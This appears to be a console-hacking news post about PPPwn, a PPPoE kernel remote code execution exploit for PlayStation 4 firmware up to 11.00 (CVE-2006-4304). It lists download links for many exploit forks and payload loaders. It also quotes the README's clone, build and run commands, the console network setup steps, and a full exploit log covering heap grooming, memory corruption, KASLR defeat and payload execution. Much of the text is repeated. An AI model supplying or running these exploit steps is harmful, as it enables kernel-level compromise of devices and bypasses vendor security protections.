Today TheOfficialFloW aka theflow0 decided to publish PPPwn ahead of his Remote Vulnerabilities in SPP talk on CVE-2006-4304 (FreeBSD.org) at TyphoonCon 2024 next month, which is the first PlayStation 4 PPPoE (Point-to-Point Protocol over Ethernet) RCE (Remote Code Execution) Kernel Exploit supporting PS4 Firmware versions up to 11.00 OFW with @KIWIDOGGIE aka kd_tech_ passing along some 11.00 Offsets (Orbis110.hpp) that can help in reverse-engineering payloads crediting developer @Al Azif (fw_defines.h / payloads_1100_and_below.zip - 46.3 KB - includes ps4-app-dumper.bin, ps4-disable-updates.bin, ps4-fan-threshold.bin, ps4-ftp.bin, ps4-module-dumper.bin, ps4-permanent-uart.bin and ps4-todex.bin via @zecoxao aka notnotzecoxao) stage2.bin (11.2 KB) and additional payloads (module_dumper.bin - 10.7 KB, permanent_uart.bin - 6.84 KB, pup_decrypter.bin - 16.8 KB, update_blocker.bin - 5.48 KB - rename to payload.bin and put on USB) and Enable Debug Menu Settings and FPKG patches (stage2_10.00.bin - 10.9 KB, stage2_10.01.bin - 10.9 KB, stage2_11.00.bin - 10.9 KB - rename file to stage2.bin and put in the stage2 folder) via @LightningMods aka LightningMods_ with Pull Requests for Ports spanning 7.50, 7.51, 7.55, 8.00, 8.01, 8.03, 8.50, 8.52, 9.00, 9.03, 9.04, 9.50, 9.51, 9.60, 10.00, 10.01, 10.50, 10.70, 10.71 and 11.00. 
While PS5 Firmware versions up to 8.20 OFW were confirmed as vulnerable to CVE-2006-4304 by theflow0 previously, according to @CrazyVoid on Twitter, "what flow released is for PS4. the PS5 is different then PS4, it might not be able to be exploited the same way" with @SpecterDev elaborating on Twitter, "Since I've seen a lot of ppl asking about it, theflow's latest RCE won't easily be adapted to PS5. PS4 is much weaker in terms of mitigations which played a part in allowing a remote exploit w/o userland code execution. PS5 is different. SMAP+CFI make this much harder to do."
He went on to state via Twitter, "XOM also plays a role, even if CFI were a non-issue, you can't easily get gadgets to ROP with either. It might not be impossible but a new strategy would be needed and you'd need to go for R/W. You'd also likely need userland code exec. I wouldn't expect anything soon.."
Download: PPPwn-master.zip / PPPwn GIT / stage2.7z (PPPwn Fork) (1.68 KB - includes stage2_9.00.bin and stage2_11.00.bin) / PPPwn GIT (Fork) via SiSTR0 for GoldHEN / 11.00 PS4 Payload Loader (PPPwn Fork) / PPPwn GIT (Fork) (includes PPPwn Stage2 PoC Payload Loader and PPPwn Test Payload, replace stage2.bin and put sample payload.bin on USB root) via @LightningMods aka LightningMods_ / PS4-9.00-11.00-PoC-bin-loader_v2.04.zip (101 KB - PPPwn working on Windows 10) / PS4 9.00 11.00 PoC Bin Loader GIT via @master s9 aka master_s9 / PPPwn_Windows_1x_beta02.7z (6.8 MB - includes stage1.bin / stage2.bin compiled for 9.00 / 11.00 - PPPwn Windows 1x Beta 02 PS4 9.00 / 11.00 Test) / PPPwn_v2.0.0.zip (409 KB - includes pppwn.exe) via master_s9 / kernel-dumper-main.zip (Kernel Dumper Payload to dump PS4 kernel on 11.00) / Kernel Dumper GIT via OBHQ (Obliteration) / PPPwnUI-release.zip / PPPwnUI GIT via B-Dem (Memz) / PS4_Toolset_2.3.zip (496.9 MB) via SAandTech / PPPwnGo-0514-2.zip (1.87 MB - includes PPPwnGo_v2.2.exe) / PPPwnGo GIT via PSGO aka rincol1015 / pppwn 1.7 GUI.zip (14.93 MB - includes PPPwn GUI 1.7.exe, requires npcap-1.79.exe) via @MODDEDWARFARE aka MODDED_WARFARE / PPPwn Exploit Runner FIX.zip (56.33 MB - includes PS4 PPPwn Exploit.exe) via SAandTech / ps4rootkit.py (PS4Rootkit PPPwn Exploit Automation Script for Ubuntu-based Linux Distros) via Crafttino21 / PPPwnLoader_v1.4_win64.zip (2.89 MB - includes PPPwn Loader.exe) / PPPwn Loader GIT via PokersKun (Junle Fong) / PPPwn-Android-master.zip / PPPwn Android GIT via Dark-life944 aka Dark_life944 / EZ.PPPwn-Bin-Loader.v1.00.by.DjPopol.zip (624 KB - EZ PPPwn-Bin-Loader v1.00) / Ez PPPwn GIT via DjPopol / PPPwnGUI release.zip (5.45 MB) / PPPwnGUI GIT (Fork) via n0201 aka n0201Git / PPPwn_cpp-main.zip (C++ rewrite of PPPwn) / PPPwn_cpp GIT via xfangfang aka rincol1015 / PPPwn-master.zip (Fork) / PPPwn GIT (Fork) via @oldschoolmodzhd aka OSM-Made aka LegendaryOSM
Here's further details from the PPPwn README.md: PPPwn - PlayStation 4 PPPoE RCE
PPPwn is a kernel remote code execution exploit for PlayStation 4 upto FW 11.00. This is a proof-of-concept exploit for CVE-2006-4304 that was reported responsibly to PlayStation.
Supported versions are:
Requirements
On your computer, clone the repository:
Change the directory to the cloned repository:
Install the requirements:
Compile the payloads:
For other firmwares, e.g. FW 9.00, pass FW=900.
Run the exploit (see ifconfig for the correct interface):
For other firmwares, e.g. FW 9.00, pass --fw=900.
On your PS4:
If the exploit works, you should see an output similar to below, and you should see Cannot connect to network. followed by PPPwned printed on your PS4.
Example run
Notes for Mac Apple Silicon Users (arm64 / aarch64)
The code will not compile on Apple Silicon and requires amd64 architecture. There is a workaround using docker which will build the bin files required. Clone this repository to your mac system, then from the repo folder run ./build-macarm.sh. This will build the binaries for PS4 FW 1100 and place the necessary files into the correct folders.
To build the binaries for a different version, i.e. 900, run the command as such: ./build-macarm.sh 900. Once built, copy this folder structure into the Linux VM and execute as instructed above.This has been tested using VMware Fusion 13.5.1, with the VM Guest as Ubuntu 24.04, and the host machine is MacOS 14.4.1
Notes for GoldHEN version
This loader only supports payloads with a kernel entrypoint.The custom version of stage2 first looks for the payload in the root directory of the USB drive, and if found, it is copied to the internal HDD at this path: /data/GoldHEN/payloads/goldhen.bin. The internal payload is then loaded and is no longer needed on the external USB drive.At the moment, only firmware versions 9.00 and 11.00 are supported. Soon, versions 10.00/10.01 will also be supported.
Reminder: All GoldHEN related issues, updates, etc go in the ongoing discussion topic for it:
While PS5 Firmware versions up to 8.20 OFW were confirmed as vulnerable to CVE-2006-4304 by theflow0 previously, according to @CrazyVoid on Twitter, "what flow released is for PS4. the PS5 is different then PS4, it might not be able to be exploited the same way" with @SpecterDev elaborating on Twitter, "Since I've seen a lot of ppl asking about it, theflow's latest RCE won't easily be adapted to PS5. PS4 is much weaker in terms of mitigations which played a part in allowing a remote exploit w/o userland code execution. PS5 is different. SMAP+CFI make this much harder to do."
He went on to state via Twitter, "XOM also plays a role, even if CFI were a non-issue, you can't easily get gadgets to ROP with either. It might not be impossible but a new strategy would be needed and you'd need to go for R/W. You'd also likely need userland code exec. I wouldn't expect anything soon.."
Download: PPPwn-master.zip / PPPwn GIT / stage2.7z (PPPwn Fork) (1.68 KB - includes stage2_9.00.bin and stage2_11.00.bin) / PPPwn GIT (Fork) via SiSTR0 for GoldHEN / 11.00 PS4 Payload Loader (PPPwn Fork) / PPPwn GIT (Fork) (includes PPPwn Stage2 PoC Payload Loader and PPPwn Test Payload, replace stage2.bin and put sample payload.bin on USB root) via @LightningMods aka LightningMods_ / PS4-9.00-11.00-PoC-bin-loader_v2.04.zip (101 KB - PPPwn working on Windows 10) / PS4 9.00 11.00 PoC Bin Loader GIT via @master s9 aka master_s9 / PPPwn_Windows_1x_beta02.7z (6.8 MB - includes stage1.bin / stage2.bin compiled for 9.00 / 11.00 - PPPwn Windows 1x Beta 02 PS4 9.00 / 11.00 Test) / PPPwn_v2.0.0.zip (409 KB - includes pppwn.exe) via master_s9 / kernel-dumper-main.zip (Kernel Dumper Payload to dump PS4 kernel on 11.00) / Kernel Dumper GIT via OBHQ (Obliteration) / PPPwnUI-release.zip / PPPwnUI GIT via B-Dem (Memz) / PS4_Toolset_2.3.zip (496.9 MB) via SAandTech / PPPwnGo-0514-2.zip (1.87 MB - includes PPPwnGo_v2.2.exe) / PPPwnGo GIT via PSGO aka rincol1015 / pppwn 1.7 GUI.zip (14.93 MB - includes PPPwn GUI 1.7.exe, requires npcap-1.79.exe) via @MODDEDWARFARE aka MODDED_WARFARE / PPPwn Exploit Runner FIX.zip (56.33 MB - includes PS4 PPPwn Exploit.exe) via SAandTech / ps4rootkit.py (PS4Rootkit PPPwn Exploit Automation Script for Ubuntu-based Linux Distros) via Crafttino21 / PPPwnLoader_v1.4_win64.zip (2.89 MB - includes PPPwn Loader.exe) / PPPwn Loader GIT via PokersKun (Junle Fong) / PPPwn-Android-master.zip / PPPwn Android GIT via Dark-life944 aka Dark_life944 / EZ.PPPwn-Bin-Loader.v1.00.by.DjPopol.zip (624 KB - EZ PPPwn-Bin-Loader v1.00) / Ez PPPwn GIT via DjPopol / PPPwnGUI release.zip (5.45 MB) / PPPwnGUI GIT (Fork) via n0201 aka n0201Git / PPPwn_cpp-main.zip (C++ rewrite of PPPwn) / PPPwn_cpp GIT via xfangfang aka rincol1015 / PPPwn-master.zip (Fork) / PPPwn GIT (Fork) via @oldschoolmodzhd aka OSM-Made aka LegendaryOSM
Here's further details from the PPPwn README.md: PPPwn - PlayStation 4 PPPoE RCE
PPPwn is a kernel remote code execution exploit for PlayStation 4 upto FW 11.00. This is a proof-of-concept exploit for CVE-2006-4304 that was reported responsibly to PlayStation.
Supported versions are:
- FW 7.50 / 7.51 / 7.55
- FW 8.00 / 8.01 / 8.03
- FW 8.50 / 8.52
- FW 9.00
- FW 9.03 / 9.04
- FW 9.50 / 9.51 / 9.60
- FW 10.00 / 10.01
- FW 10.50 / 10.70 / 10.71
- FW 11.00
- more can be added (PRs are welcome)
Requirements
- Computer with Ethernet port
- USB adapter also works
- Ethernet cable
- Linux
- You can use VirtualBox to create a Linux VM with Bridged Adapter as network adapter to use the ethernet port in the VM.
- Python3 and gcc installed
On your computer, clone the repository:
Code:
git clone --recursive https://github.com/TheOfficialFloW/PPPwn
Code:
cd PPPwn
Code:
sudo pip install -r requirements.txt
Code:
make -C stage1 FW=1100 clean && make -C stage1 FW=1100
make -C stage2 FW=1100 clean && make -C stage2 FW=1100Run the exploit (see ifconfig for the correct interface):
Code:
sudo python3 pppwn.py --interface=enp0s3 --fw=1100On your PS4:
- Go to Settings and then Network
- Select Set Up Internet connection and choose Use a LAN Cable
- Choose Custom setup and choose PPPoE for IP Address Settings
- Enter anything for PPPoE User ID and PPPoE Pasword
- Choose Automatic for DNS Settings and MTU Settings
- Choose Do Not Use for Proxy Server
- Click Test Internet Connection to communicate with your computer
If the exploit works, you should see an output similar to below, and you should see Cannot connect to network. followed by PPPwned printed on your PS4.
Example run
Code:
[+] PPPwn - PlayStation 4 PPPoE RCE by theflow
[+] args: interface=enp0s3 fw=1100 stage1=stage1/stage1.bin stage2=stage2/stage2.bin
[+] STAGE 0: Initialization
[*] Waiting for PADI...
[+] pppoe_softc: 0xffffabd634beba00
[+] Target MAC: xx:xx:xx:xx:xx:xx
[+] Source MAC: 07:ba:be:34:d6:ab
[+] AC cookie length: 0x4e0
[*] Sending PADO...
[*] Waiting for PADR...
[*] Sending PADS...
[*] Waiting for LCP configure request...
[*] Sending LCP configure ACK...
[*] Sending LCP configure request...
[*] Waiting for LCP configure ACK...
[*] Waiting for IPCP configure request...
[*] Sending IPCP configure NAK...
[*] Waiting for IPCP configure request...
[*] Sending IPCP configure ACK...
[*] Sending IPCP configure request...
[*] Waiting for IPCP configure ACK...
[*] Waiting for interface to be ready...
[+] Target IPv6: fe80::2d9:d1ff:febc:83e4
[+] Heap grooming...done
[+] STAGE 1: Memory corruption
[+] Pinning to CPU 0...done
[*] Sending malicious LCP configure request...
[*] Waiting for LCP configure request...
[*] Sending LCP configure ACK...
[*] Sending LCP configure request...
[*] Waiting for LCP configure ACK...
[*] Waiting for IPCP configure request...
[*] Sending IPCP configure NAK...
[*] Waiting for IPCP configure request...
[*] Sending IPCP configure ACK...
[*] Sending IPCP configure request...
[*] Waiting for IPCP configure ACK...
[+] Scanning for corrupted object...found fe80::0fdf:4141:4141:4141
[+] STAGE 2: KASLR defeat
[*] Defeating KASLR...
[+] pppoe_softc_list: 0xffffffff884de578
[+] kaslr_offset: 0x3ffc000
[+] STAGE 3: Remote code execution
[*] Sending LCP terminate request...
[*] Waiting for PADI...
[+] pppoe_softc: 0xffffabd634beba00
[+] Target MAC: xx:xx:xx:xx:xx:xx
[+] Source MAC: 97:df:ea:86:ff:ff
[+] AC cookie length: 0x511
[*] Sending PADO...
[*] Waiting for PADR...
[*] Sending PADS...
[*] Triggering code execution...
[*] Waiting for stage1 to resume...
[*] Sending PADT...
[*] Waiting for PADI...
[+] pppoe_softc: 0xffffabd634be9200
[+] Target MAC: xx:xx:xx:xx:xx:xx
[+] AC cookie length: 0x0
[*] Sending PADO...
[*] Waiting for PADR...
[*] Sending PADS...
[*] Waiting for LCP configure request...
[*] Sending LCP configure ACK...
[*] Sending LCP configure request...
[*] Waiting for LCP configure ACK...
[*] Waiting for IPCP configure request...
[*] Sending IPCP configure NAK...
[*] Waiting for IPCP configure request...
[*] Sending IPCP configure ACK...
[*] Sending IPCP configure request...
[*] Waiting for IPCP configure ACK...
[+] STAGE 4: Arbitrary payload execution
[*] Sending stage2 payload...
[+] Done!The code will not compile on Apple Silicon and requires amd64 architecture. There is a workaround using docker which will build the bin files required. Clone this repository to your mac system, then from the repo folder run ./build-macarm.sh. This will build the binaries for PS4 FW 1100 and place the necessary files into the correct folders.
To build the binaries for a different version, i.e. 900, run the command as such: ./build-macarm.sh 900. Once built, copy this folder structure into the Linux VM and execute as instructed above.This has been tested using VMware Fusion 13.5.1, with the VM Guest as Ubuntu 24.04, and the host machine is MacOS 14.4.1
Notes for GoldHEN version
This loader only supports payloads with a kernel entrypoint.The custom version of stage2 first looks for the payload in the root directory of the USB drive, and if found, it is copied to the internal HDD at this path: /data/GoldHEN/payloads/goldhen.bin. The internal payload is then loaded and is no longer needed on the external USB drive.At the moment, only firmware versions 9.00 and 11.00 are supported. Soon, versions 10.00/10.01 will also be supported.
Reminder: All GoldHEN related issues, updates, etc go in the ongoing discussion topic for it:
